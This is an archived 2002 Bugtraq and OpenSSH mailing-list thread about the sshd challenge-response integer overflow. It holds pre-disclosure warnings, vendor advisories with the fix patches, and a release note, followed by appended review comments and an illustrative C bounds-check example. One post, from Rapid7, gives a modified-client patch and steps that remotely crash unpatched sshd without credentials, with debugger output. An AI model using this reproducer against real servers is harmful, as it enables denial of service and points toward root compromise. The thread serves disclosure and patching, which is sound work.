8647205 2002-06-24 19:35 -0700 /13 lines/ John Williams <jw@mksecure.com>
Sent by: joel@lysator.liu.se
Imported: 2002-06-25 21:55 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <22811>
Subject: OpenSSH vulnerability
------------------------------------------------------------
From: "John Williams" <jw@mksecure.com>
To: <bugtraq@securityfocus.com>
Message-ID: <000401c21bf1$099e41f0$1300000a@walter>

Just noticed this linked from freshmeat, didn't see it here yet.
Sounds bad.

http://www.debian.org/security/2002/dsa-134

--JW
(8647205) /John Williams <jw@mksecure.com>/(Re-wrapped)

8648385 2002-06-24 15:00 -0600 /88 lines/ Theo de Raadt <deraadt@cvs.openbsd.org>
Sent by: joel@lysator.liu.se
Imported: 2002-06-26 07:53 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External CC recipient: dsi@iss.net
External CC recipient: announce@openbsd.org
External CC recipient: misc@openbsd.org
Recipient: Bugtraq (import) <22815>
Subject: Upcoming OpenSSH vulnerability
------------------------------------------------------------
From: Theo de Raadt <deraadt@cvs.openbsd.org>
To: bugtraq@securityfocus.com
Cc: misc@openbsd.org
Message-ID: <200206242100.g5OL0BLJ019128@cvs.openbsd.org>

There is an upcoming OpenSSH vulnerability that we're working on with
ISS. Details will be published early next week.

However, I can say that when OpenSSH's sshd(8) is running with priv
separation, the bug cannot be exploited.

OpenSSH 3.3p was released a few days ago, with various improvements
but in particular, it significantly improves the Linux and Solaris
support for priv sep. However, it is not yet perfect. Compression is
disabled on some systems, and the many varieties of PAM are causing
major headaches.

However, everyone should update to OpenSSH 3.3 immediately, and enable
priv separation in their ssh daemons, by setting this in your
/etc/ssh/sshd_config file:

        UsePrivilegeSeparation yes

Depending on what your system is, privsep may break some ssh
functionality. However, with privsep turned on, you are immune from
at least one remote hole. Understand?

3.3 does not contain a fix for this upcoming bug.

If priv separation does not work on your operating system, you need
to work with your vendor so that we get patches to make it work on
your system. Our developers are swamped enough without trying to
support the myriad of PAM and other issues which exist in various
systems. You must call on your vendors to help us.

Basically, OpenSSH sshd(8) is something like 27000 lines of code. A
lot of that runs as root. But when UsePrivilegeSeparation is enabled,
the daemon splits into two parts. A part containing about 2500 lines
of code remains as root, and the rest of the code is shoved into a
chroot-jail without any privs. This makes the daemon less vulnerable
to attack.

We've been trying to warn vendors about 3.3 and the need for privsep,
but they really have not heeded our call for assistance. They have
basically ignored us.
Some, like Alan Cox, even went further stating that privsep was not
being worked on because "Nobody provided any info which proves the
problem, and many people dont trust you theo" and suggested I "might
be feeding everyone a trojan" (I think I'll publish that letter -- it
is just so funny). HP's representative was downright rude, but that
is OK because Compaq is retiring him. Except for Solar Designer, I
think none of them has helped the OpenSSH portable developers make
privsep work better on their systems. Apparently Solar Designer is
the only person who understands the need for this stuff.

So, if vendors would JUMP and get it working better, and send us
patches IMMEDIATELY, we can perhaps make a 3.3.1p release on Friday
which supports these systems better. So send patches by Thursday
night please. Then on Tuesday or Wednesday the complete bug report
with patches (and exploits soon after I am sure) will hit BUGTRAQ.

Let me repeat: even if the bug exists in a privsep'd sshd, it is not
exploitable. Clearly we cannot yet publish what the bug is, or
provide anyone with the real patch, but we can try to get maximum
deployment of privsep, and therefore make it hurt less when the
problem is published.

So please push your vendor to get us maximally working privsep
patches as soon as possible!

We've given most vendors since Friday last week until Thursday to get
privsep working well for you so that when the announcement comes out
next week their customers are immunized. That is nearly a full week
(but they have already wasted a weekend and a Monday). Really I think
this is the best we can hope to do (this thing will eventually leak,
at which point the details will be published).

Customers can judge their vendors by how they respond to this issue.

OpenBSD and NetBSD users should also update to OpenSSH 3.3 right
away. On OpenBSD privsep works flawlessly, and I have reports that is
also true on NetBSD.
All other systems appear to have minor or major weaknesses when this
code is running.

(securityfocus postmaster; please post this through immediately, since
i have bcc'd over 30 other places..)
(8648385) /Theo de Raadt <deraadt@cvs.openbsd.org>/-

8651054 2002-06-26 16:42 +0200 /95 lines/ Markus Friedl <markus@openbsd.org>
Sent by: henrik@edlund.org
Imported: 2002-06-26 17:00 by Brevbäraren
External recipient: openssh-unix-announce@mindrot.org
External replies to: openssh@openssh.com
Recipient: Cracking erfarenhetsutbyte <14517>
Recipient: SSH (Secure Shell -) erfarenhetsutbyte <1005>
    Sent: 2002-06-26 17:05
    Sent by Andreas Lange (Framtidsplanerar)
Marked by 1 person.
Subject: [openssh-unix-announce] OpenSSH Security Advisory (adv.iss)
------------------------------------------------------------
1. Versions affected:

        All versions of OpenSSH's sshd between 2.9.9 and 3.3
        contain an input validation error that can result in
        an integer overflow and privilege escalation.

        OpenSSH 3.4 and later are not affected.

        OpenSSH 3.2 and later prevent privilege escalation
        if UsePrivilegeSeparation is enabled in sshd_config.
        OpenSSH 3.3 enables UsePrivilegeSeparation by
        default.

        Although OpenSSH 2.9 and earlier are not affected,
        upgrading to OpenSSH 3.4 is recommended, because
        OpenSSH 3.4 adds checks for a class of potential bugs.

2. Impact:

        This bug can be exploited remotely if
        ChallengeResponseAuthentication is enabled in sshd_config.

        Affected are at least systems supporting
        s/key over SSH protocol version 2 (OpenBSD, FreeBSD
        and NetBSD as well as other systems supporting
        s/key with SSH). Exploitability of systems
        using PAM in combination has not been verified.

3. Short-Term Solution:

        Disable ChallengeResponseAuthentication in sshd_config.

        or

        Enable UsePrivilegeSeparation in sshd_config.

4. Solution:

        Upgrade to OpenSSH 3.4 or apply the following patches.

5. Credits:

        ISS.
Appendix: A: Index: auth2-chall.c =================================================================== RCS file: /cvs/src/usr.bin/ssh/auth2-chall.c,v retrieving revision 1.18 diff -u -r1.18 auth2-chall.c --- auth2-chall.c 19 Jun 2002 00:27:55 -0000 1.18 +++ auth2-chall.c 26 Jun 2002 09:37:03 -0000 @@ -256,6 +256,8 @@ authctxt->postponed = 0; /* reset */ nresp = packet_get_int(); + if (nresp > 100) + fatal("input_userauth_info_response: nresp too big %u", nresp); if (nresp > 0) { response = xmalloc(nresp * sizeof(char*)); for (i = 0; i < nresp; i++) B: Index: auth2-pam.c =================================================================== RCS file: /var/cvs/openssh/auth2-pam.c,v retrieving revision 1.12 diff -u -r1.12 auth2-pam.c --- auth2-pam.c 22 Jan 2002 12:43:13 -0000 1.12 +++ auth2-pam.c 26 Jun 2002 10:12:31 -0000 
@@ -140,6 +140,15 @@ nresp = packet_get_int(); /* Number of responses. */ debug("got %d responses", nresp); + + if (nresp != context_pam2.num_expected) + fatal("%s: Received incorrect number of responses " + "(expected %u, received %u)", __func__, nresp, + context_pam2.num_expected); + + if (nresp > 100) + fatal("%s: too many replies", __func__); + for (i = 0; i < nresp; i++) { int j = context_pam2.prompts[i];

_______________________________________________
openssh-unix-announce@mindrot.org mailing list
http://www.mindrot.org/mailman/listinfo/openssh-unix-announce
(8651054) /Markus Friedl <markus@openbsd.org>/------
Comment in text 8651076 by Nixon (remontado) (i röd zon)
Comment in text 8651101
Comment in text 8651117 by Peter Eriksson LYSATOR/IFM/iRoot

8651233 2002-06-26 16:40 +0200 /44 lines/ Markus Friedl <Markus_Friedl@genua.de>
Sent by: henrik@edlund.org
Imported: 2002-06-26 17:21 by Brevbäraren
External recipient: openssh-unix-announce@mindrot.org
External replies to: openssh@openssh.com
Recipient: Cracking erfarenhetsutbyte <14522>
Recipient: SSH (Secure Shell -) erfarenhetsutbyte <1014>
    Sent: 2002-06-26 17:55
    Sent by Joel Rosdahl (25), Enea Epact
Subject: [openssh-unix-announce] OpenSSH 3.4 released
------------------------------------------------------------
OpenSSH 3.4 has just been released. It will be available from the
mirrors listed at http://www.openssh.com/ shortly.

OpenSSH is a 100% complete SSH protocol version 1.3, 1.5 and 2.0
implementation and includes sftp client and server support.

We would like to thank the OpenSSH community for their continued
support and encouragement.

Changes since OpenSSH 3.3:
============================

Security Changes:
=================

All versions of OpenSSH's sshd between 2.9.9 and 3.3
contain an input validation error that can result in
an integer overflow and privilege escalation.

OpenSSH 3.4 fixes this bug.
In addition, OpenSSH 3.4 adds many checks to detect
invalid input and mitigate resource exhaustion attacks.

OpenSSH 3.2 and later prevent privilege escalation
if UsePrivilegeSeparation is enabled in sshd_config.
OpenSSH 3.3 enables UsePrivilegeSeparation by
default.

Reporting Bugs:
===============

- please read http://www.openssh.com/report.html
  and http://bugzilla.mindrot.org/

OpenSSH is brought to you by Markus Friedl, Niels Provos, Theo de
Raadt, Kevin Steves, Damien Miller and Ben Lindstrom.

_______________________________________________
openssh-unix-announce@mindrot.org mailing list
http://www.mindrot.org/mailman/listinfo/openssh-unix-announce
(8651233) /Markus Friedl <Markus_Friedl@genua.de>/(Re-wrapped)

8651030 2002-06-26 09:56 -0400 /155 lines/ X-Force <xforce@iss.net>
Sent by: joel@lysator.liu.se
Imported: 2002-06-26 16:57 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <22819>
Subject: ISS Advisory: OpenSSH Remote Challenge Vulnerability
------------------------------------------------------------
From: X-Force <xforce@iss.net>
To: bugtraq@securityfocus.com
Message-ID: <200206261356.g5QDu7B10394@ra.iss.net>

Internet Security Systems Security Advisory
June 26, 2002

OpenSSH Remote Challenge Vulnerability

Synopsis:

ISS X-Force has discovered a serious vulnerability in the default
installation of OpenSSH on the OpenBSD operating system. OpenSSH is a
free version of the SSH (Secure Shell) communications suite and is
used as a secure replacement for protocols such as Telnet, Rlogin,
Rsh, and Ftp. OpenSSH employs end-to-end encryption (including all
passwords) and is resistant to network monitoring, eavesdropping, and
connection hijacking attacks. X-Force is aware of active exploit
development for this vulnerability.

Impact:

OpenBSD, FreeBSD-Current, and other OpenSSH implementations may be
vulnerable to a remote, superuser compromise.

Affected Versions:

OpenBSD 3.0
OpenBSD 3.1
FreeBSD-Current
OpenSSH 3.0-3.2.3

OpenSSH version 3.3 implements "privilege separation" which mitigates
the risk of a superuser compromise. Prior to the release of this
advisory, ISS and OpenBSD encouraged all OpenSSH users to upgrade to
version 3.3.

Versions of FreeBSD-Current built between March 18, 2002 and June 23,
2002 are vulnerable to remote superuser compromise. Privilege
separation was implemented in FreeBSD-Current on June 23, 2002.

Note: OpenSSH is included in many operating system distributions,
networking equipment, and security appliances. Refer to the following
address for information about vendors that implement OpenSSH:
http://www.openssh.com/users.html

Description:

A vulnerability exists within the "challenge-response" authentication
mechanism in the OpenSSH daemon (sshd). This mechanism, part of the
SSH2 protocol, verifies a user's identity by generating a challenge
and forcing the user to supply a number of responses. It is possible
for a remote attacker to send a specially-crafted reply that triggers
an overflow.
This can result in a remote denial of service attack on the OpenSSH
daemon or a complete remote compromise. The OpenSSH daemon runs with
superuser privilege, so remote attackers can gain superuser access by
exploiting this vulnerability.

OpenSSH supports the SKEY and BSD_AUTH authentication options. These
are compile-time options. At least one of these options must be
enabled before the OpenSSH binaries are compiled for the vulnerable
condition to be present. OpenBSD 3.0 and later is distributed with
BSD_AUTH enabled. The SKEY and BSD_AUTH options are not enabled by
default in many distributions. However, if these options are
explicitly enabled, that build of OpenSSH may be vulnerable.

Recommendations:

Internet Scanner X-Press Update 6.13 includes a check, OpenSshRunning,
to detect potentially vulnerable installations of OpenSSH. XPU 6.13 is
available from the ISS Download Center at:
http://www.iss.net/download. For questions about downloading and
installing this XPU, email support@iss.net.

ISS X-Force recommends that system administrators disable unused
OpenSSH authentication mechanisms. Administrators can remove this
vulnerability by disabling the Challenge-Response authentication
parameter within the OpenSSH daemon configuration file. This filename
and path is typically: /etc/ssh/sshd_config. To disable this
parameter, locate the corresponding line and change it to the line
below:

        ChallengeResponseAuthentication no

The "sshd" process must be restarted for this change to take effect.
This workaround will permanently remove the vulnerability. X-Force
recommends that administrators upgrade to OpenSSH version 3.4
immediately. This version implements privilege separation, contains a
patch to block this vulnerability, and contains many additional
proactive security fixes. Privilege separation was designed to limit
exposure to known and unknown vulnerabilities. Visit
http://www.openssh.com for more information.
Additional Information:

ISS X-Force and Black Hat consulting will host a presentation titled,
"Professional Source Code Auditing" at Black Hat Briefings USA 2002.
The presentation will explore advanced source code auditing techniques
as well as secure development best-practices. Please refer to
http://www.blackhat.com and
http://www.blackhat.com/html/bh-usa-02/bh-usa-02-speakers.html#Dowd
for more information.

Credits:

The vulnerability described in this advisory was discovered and
researched by Mark Dowd of the ISS X-Force. ISS would like to thank
Theo de Raadt of the OpenBSD Project for his assistance with this
advisory.

______

About Internet Security Systems (ISS)
Founded in 1994, Internet Security Systems (ISS) (Nasdaq: ISSX) is a
pioneer and world leader in software and services that protect
critical online resources from an ever-changing spectrum of threats
and misuse. Internet Security Systems is headquartered in Atlanta, GA,
with additional operations throughout the Americas, Asia, Australia,
Europe and the Middle East.

Copyright (c) 2002 Internet Security Systems, Inc. All rights reserved
worldwide.

Permission is hereby granted for the electronic redistribution of this
document. It is not to be edited or altered in any way without the
express written consent of the Internet Security Systems X-Force. If
you wish to reprint the whole or any part of this document in any
other medium excluding electronic media, please email xforce@iss.net
for permission.

Disclaimer: The information within this paper may change without
notice. Use of this information constitutes acceptance for use in an
AS IS condition. There are NO warranties, implied or otherwise, with
regard to this information or its use. Any use of this information is
at the user's risk. In no event shall the author/distributor (Internet
Security Systems X-Force) be held liable for any damages whatsoever
arising out of or in connection with the use or spread of this
information.
X-Force PGP Key available on MIT's PGP key server and PGP.com's key
server, as well as at http://www.iss.net/security_center/sensitive.php

Please send suggestions, updates, and comments to: X-Force
(8651030) /X-Force <xforce@iss.net>/------(Re-wrapped)
Comment in text 8651051
Comment in text 8651198
Comment in text 8651439

8651731 2002-06-25 22:53 +0400 /82 lines/ Solar Designer <solar@openwall.com>
Sent by: joel@lysator.liu.se
Imported: 2002-06-26 19:47 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External CC recipient: announce@lists.openwall.com
External CC recipient: owl-users@lists.openwall.com
External CC recipient: lwn@lwn.net
External CC recipient: Theo de Raadt <deraadt@cvs.openbsd.org>
Recipient: Bugtraq (import) <22822>
Subject: Re: Upcoming OpenSSH vulnerability
------------------------------------------------------------
From: Solar Designer <solar@openwall.com>
To: bugtraq@securityfocus.com
Cc: announce@lists.openwall.com, owl-users@lists.openwall.com,
    lwn@lwn.net, Theo de Raadt <deraadt@cvs.openbsd.org>
Message-ID: <20020625225304.A4307@openwall.com>

On Mon, Jun 24, 2002 at 03:00:10PM -0600, Theo de Raadt wrote:
> There is an upcoming OpenSSH vulnerability that we're working on with
> ISS. Details will be published early next week.
>
> However, I can say that when OpenSSH's sshd(8) is running with priv
> separation, the bug cannot be exploited.
>
> OpenSSH 3.3p was released a few days ago, with various improvements
> but in particular, it significantly improves the Linux and Solaris
> support for priv sep. However, it is not yet perfect. Compression is
> disabled on some systems, and the many varieties of PAM are causing
> major headaches.
>
> However, everyone should update to OpenSSH 3.3 immediately, and enable
> priv separation in their ssh daemons, by setting this in your
> /etc/ssh/sshd_config file:
>
> UsePrivilegeSeparation yes

Owl-current has been updated to include OpenSSH 3.3p1 with privilege
separation enabled (and a patch to make that work on Linux 2.2 kernels
which we continue to support). The updated source tree and packages
went to the FTP mirrors by Monday. This stuff is, however, still
being hacked on because of certain minor functionality problems that
remain in this rushed release. Expect further updates in the
following days and next week.

It is strongly recommended that Openwall GNU/*/Linux (Owl) users
update first to these 3.3p1-based privilege separated update packages
and then to ones based on the upcoming OpenSSH releases.
The details of the changes we apply will be documented in change logs
for the OpenSSH package as well as in the system-wide change logs
under Owl/doc/CHANGES in the native tree, also available via the web:

http://www.openwall.com/Owl/CHANGES.shtml

The SSH server used to be the only Internet service provided with Owl
that didn't utilize privilege separation approaches. Now, thanks to
the excellent work by Niels Provos, we are able to provide a system
where all the Internet services are provided with privilege-separated
implementations. That includes FTP, SMTP, POP3, Telnet, and now SSH.

Those curious of how this all works may see our diagrams of the FTP,
POP3, and Telnet servers in our CanSecWest/core02 / NordU2002 slides:

http://www.openwall.com/presentations/core02-owl-html+images/

The FTP server is Chris Evans' vsftpd. The POP3 is popa3d. And the
Telnet is a port from OpenBSD with privilege separation introduced in
a way similar to what Chris Evans did in his patches to NetKit's (but
the code is different). In all cases, the processes which talk to the
remote client are running as a dedicated pseudo-user (different for
each service) and chroot'ed to an empty directory (/var/empty).

For the privilege-separated OpenSSH sshd, please refer to Niels
Provos' web page on the topic:

http://www.citi.umich.edu/u/provos/ssh/privsep.html

The SMTP server is Postfix, with many of its components running in a
chroot jail:

http://www.postfix.org/security.html
http://www.postfix.org/big-picture.html

In fact, the checking of file accesses performed by Postfix that we
did as a part of maintenance of the package on Owl has contributed to
making Postfix's privilege separation more solid (starting with the
20011217 snapshot).
--
/sd
(8651731) /Solar Designer <solar@openwall.com>/(Re-wrapped)

8657897 2002-06-27 13:15 -0400 /143 lines/ Joe Testa <jtesta@rapid7.com>
Sent by: joel@lysator.liu.se
Imported: 2002-06-28 01:01 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <22857>
Subject: How to reproduce OpenSSH Overflow.
------------------------------------------------------------
From: Joe Testa <jtesta@rapid7.com>
To: bugtraq@securityfocus.com
Message-ID: <3D1B4820.10202@rapid7.com>

The R7 team did a little investigating into one of the OpenSSH
vulnerabilities. The following are instructions on how to reproduce a
segmentation violation in sshd (v3.2.3p1):

0.) Compile with PAM and S/KEY support.

1.) Apply the following patch to the ssh client:

- --- sshconnect2.c.bak Thu Jun 27 11:54:54 2002 +++ sshconnect2.c Thu Jun 27 11:56:27 2002 @@ -866,6 +866,7 @@ xfree(lang); num_prompts = packet_get_int(); + num_prompts = 2; /* * Begin to build info response packet based on prompts requested. * We commit to providing the correct number of responses, so if
@@ -877,15 +878,16 @@ debug2("input_userauth_info_req: num_prompts %d", num_prompts); for (i = 0; i < num_prompts; i++) { + if ( i == 0 ) { prompt = packet_get_string(NULL); echo = packet_get_char(); response = read_passphrase(prompt, echo ? RP_ECHO : 0); - - + } packet_put_cstring(response); - - memset(response, 0, strlen(response)); + /*memset(response, 0, strlen(response)); xfree(response); - - xfree(prompt); + xfree(prompt);*/ } packet_check_eom(); /* done with parsing incoming message. */

2.) Add "PAMAuthenticationViaKbdInt yes" to 'sshd_config'.

3.) Connect to sshd using the modified client.

Note: valid credentials are not required.

On the server side, you'll see:

[root@wonderland hi_chad]# gdb /usr/sbin/sshd
GNU gdb Red Hat Linux 7.x (5.0rh-15) (MI_OUT)
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
(gdb) run -d
Starting program: /usr/sbin/sshd -d
debug1: sshd version OpenSSH_3.2.3p1
debug1: private host key: #0 type 0 RSA1
debug1: read PEM private key done: type RSA
debug1: private host key: #1 type 1 RSA
debug1: read PEM private key done: type DSA
debug1: private host key: #2 type 2 DSA
socket: Address family not supported by protocol
debug1: Bind to port 22 on 0.0.0.0.
Server listening on 0.0.0.0 port 22.
Generating 768 bit RSA key.
RSA key generation complete.
debug1: Server will not fork when running in debugging mode.
Connection from 127.0.0.1 port 33208
debug1: Client protocol version 2.0; client software version OpenSSH_3.2.3p1
debug1: match: OpenSSH_3.2.3p1 pat OpenSSH*
Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-1.99-OpenSSH_3.2.3p1
debug1: list_hostkey_types: ssh-rsa,ssh-dss
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: client->server aes128-cbc hmac-md5 none
debug1: kex: server->client aes128-cbc hmac-md5 none
debug1: SSH2_MSG_KEX_DH_GEX_REQUEST received
debug1: SSH2_MSG_KEX_DH_GEX_GROUP sent
debug1: dh_gen_key: priv key bits set: 124/256
debug1: bits set: 1626/3191
debug1: expecting SSH2_MSG_KEX_DH_GEX_INIT
debug1: bits set: 1597/3191
debug1: SSH2_MSG_KEX_DH_GEX_REPLY sent
debug1: kex_derive_keys
debug1: newkeys: mode 1
debug1: SSH2_MSG_NEWKEYS sent
debug1: waiting for SSH2_MSG_NEWKEYS
debug1: newkeys: mode 0
debug1: SSH2_MSG_NEWKEYS received
debug1: KEX done
debug1: userauth-request for user jdog service ssh-connection method none
debug1: attempt 0 failures 0
debug1: Starting up PAM with username "jdog"
debug1: PAM setting rhost to "localhost.localdomain"
Failed none for jdog from 127.0.0.1 port 33208 ssh2
debug1: userauth-request for user jdog service ssh-connection method keyboard-interactive
debug1: attempt 1 failures 1
debug1: keyboard-interactive devs
debug1: auth2_challenge: user=jdog devs=
debug1: kbdint_alloc: devices 'skey'
debug1: auth2_challenge_start: trying authentication method 'skey'
debug1: got 2 responses
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x08053822 in strcpy ()
(gdb)

Comments are much appreciated.
    - Joe

GPG key: http://www.cs.rit.edu/~jst3290/joetesta_r7.pub
A22B 2683 C40E 5443 AE52 AD6D 65B2 F5DF 4B11 06B4
(8657897) /Joe Testa <jtesta@rapid7.com>/-(Re-wrapped)
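
Review bot: in the auth2-chall.c hunk (Appendix A of the OpenSSH advisory earlier in this thread), the added check only caps nresp at the literal 100 before xmalloc(nresp * sizeof(char*)); unlike the auth2-pam.c hunk, it does not compare the count against the number of prompts the server sent. If that number is tracked at this point, a mismatch should be rejected here as well, and the literal 100, which appears in both files, would be better as one named constant so the two limits cannot drift apart.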
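
Review bot: in the auth2-pam.c hunk (Appendix B of the OpenSSH advisory earlier in this thread), the first fatal() passes its arguments in the opposite order to its format string: the text reads "(expected %u, received %u)" but the arguments are nresp followed by context_pam2.num_expected, so the log line reports the two values swapped. Swapping the two arguments fixes it. The debug() line just above prints nresp with %d while the new fatal() uses %u; both should use the specifier that matches the declared type of nresp.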
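
The two checks added by the advisory patches in this thread, and the size arithmetic they guard, as an added C example that is not part of any message above and is not OpenSSH code. The function names, the MAX_KBDINT_RESPONSES constant and the 32-bit model (4-byte pointers, 32-bit size_t) are assumptions made for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical name for the ceiling of 100 used in both advisory patches. */
#define MAX_KBDINT_RESPONSES 100u

/*
 * Bytes an unchecked "xmalloc(nresp * sizeof(char*))" would request on a
 * platform with 4-byte pointers and a 32-bit size_t (assumed model).
 * uint32_t arithmetic reproduces the modulo-2^32 wrap on any build host.
 */
uint32_t alloc_bytes_ilp32(uint32_t nresp)
{
    return (uint32_t)(nresp * UINT32_C(4));
}

/*
 * Returns 0 when the count read from the packet is acceptable, -1 otherwise.
 * Same two conditions as the auth2-pam.c patch: the count must equal the
 * number of prompts the server sent and must not exceed the ceiling.
 */
int check_nresp(uint32_t nresp, uint32_t num_expected)
{
    if (nresp != num_expected)
        return -1;
    if (nresp > MAX_KBDINT_RESPONSES)
        return -1;
    return 0;
}

/*
 * Allocate the response array only after the count has been validated.
 * calloc() checks count * size for overflow itself, so the size cannot
 * wrap even if the ceiling is raised later.
 */
char **alloc_responses(uint32_t nresp, uint32_t num_expected)
{
    if (nresp == 0 || check_nresp(nresp, num_expected) != 0)
        return NULL;
    return calloc(nresp, sizeof(char *));
}

int main(void)
{
    /* Constructed sample counts, not taken from any captured traffic. */
    const uint32_t samples[] = { 1u, 2u, 100u, 101u, 0x40000001u };
    const uint32_t num_expected = 1u;   /* server sent one prompt */
    size_t i;

    for (i = 0; i < sizeof(samples) / sizeof(samples[0]); i++) {
        uint32_t n = samples[i];
        printf("nresp=%10lu  unchecked alloc=%10lu bytes  check=%s\n",
               (unsigned long)n, (unsigned long)alloc_bytes_ilp32(n),
               check_nresp(n, num_expected) == 0 ? "accept" : "reject");
    }
    return 0;
}
```

The last sample row shows why a bound has to be applied before the multiplication: the requested size wraps to a handful of bytes while the loop that follows would still iterate nresp times.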